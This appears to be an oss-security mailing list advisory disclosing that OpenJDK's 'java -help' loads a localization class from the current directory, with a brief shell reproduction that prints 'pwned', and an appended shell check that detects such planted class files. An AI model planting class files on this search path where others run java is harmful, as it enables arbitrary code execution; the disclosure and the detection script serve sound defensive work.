Message-ID: <20170613152313.te53ju5sh77ptnix@jwilk.net>
Date: Tue, 13 Jun 2017 17:23:13 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: OpenJDK: java(1): untrusted search path

Running "java -help" can load code from a subdirectory of cwd:

  $ javac launcher_en.java
  $ mkdir -p sun/launcher/resources/
  $ mv launcher_en.class sun/launcher/resources/
  $ java -help
   _______
  < pwned >
   -------
          \   ^__^
           \  (oo)\_______
              (__)\       )\/\
                  ||----w |
                  ||     ||

This happens because:

* By default (i.e. when CLASSPATH env var was unset and neither -cp nor -jar
  was specified), java sets "." as the user class path:
  https://docs.oracle.com/javase/8/docs/technotes/tools/findingclasses.html#userclass

* The help message is apparently supposed to be internationalized.

* Java's localization machinery loads classes:
  https://docs.oracle.com/javase/8/docs/api/java/util/ResourceBundle.html

On Debian systems, jarwrapper (a binfmt-misc thing for running executable jar
files) is affected. It contains the following code:

  if java -d32 2>&1 | grep "does not support" > /dev/null; then
  ...

On 32-bit systems, this causes java to print the help message.

--
Jakub Wilk
View attachment "launcher_en.java" of type "text/x-java" (413 bytes)
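
Added example, not part of the original post: a POSIX shell check that a wrapper script could run before invoking java, flagging a directory that holds class files at the sun/launcher/resources path from the reproduction above while the class path still includes the cwd. It models only the CLASSPATH variable (it assumes neither -cp nor -jar is passed); the function names are illustrative, and treating an empty class path entry as the cwd is a conservative assumption.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are illustrative.

# cwd_on_classpath IS_SET VALUE
# IS_SET is "1" when CLASSPATH is set in the environment, anything else
# when it is unset. Returns 0 (true) when the class path includes the cwd.
cwd_on_classpath() {
    [ "$1" = 1 ] || return 0      # unset: java defaults the class path to "."
    case ":$2:" in
        *:.:*|*:./:*) return 0 ;; # explicit "." entry
        *::*) return 0 ;;         # empty entry: assumed to mean the cwd
    esac
    return 1
}

# launcher_bundles DIR
# Prints, one per line, class files located where the launcher's resource
# bundle lookup found launcher_en.class in the post.
launcher_bundles() {
    for f in "$1"/sun/launcher/resources/launcher*.class; do
        if [ -f "$f" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# java_cwd_exposed DIR IS_SET VALUE
# Returns 0 when running a bare `java` from DIR with that CLASSPATH state
# would search DIR and DIR contains a launcher bundle class.
java_cwd_exposed() {
    cwd_on_classpath "$2" "$3" || return 1
    [ -n "$(launcher_bundles "$1")" ]
}

# Stand-alone use: check the current directory against the live environment.
if java_cwd_exposed . "${CLASSPATH+1}" "${CLASSPATH-}"; then
    echo "launcher bundle class found under ./sun/launcher/resources" >&2
    launcher_bundles . >&2
fi
```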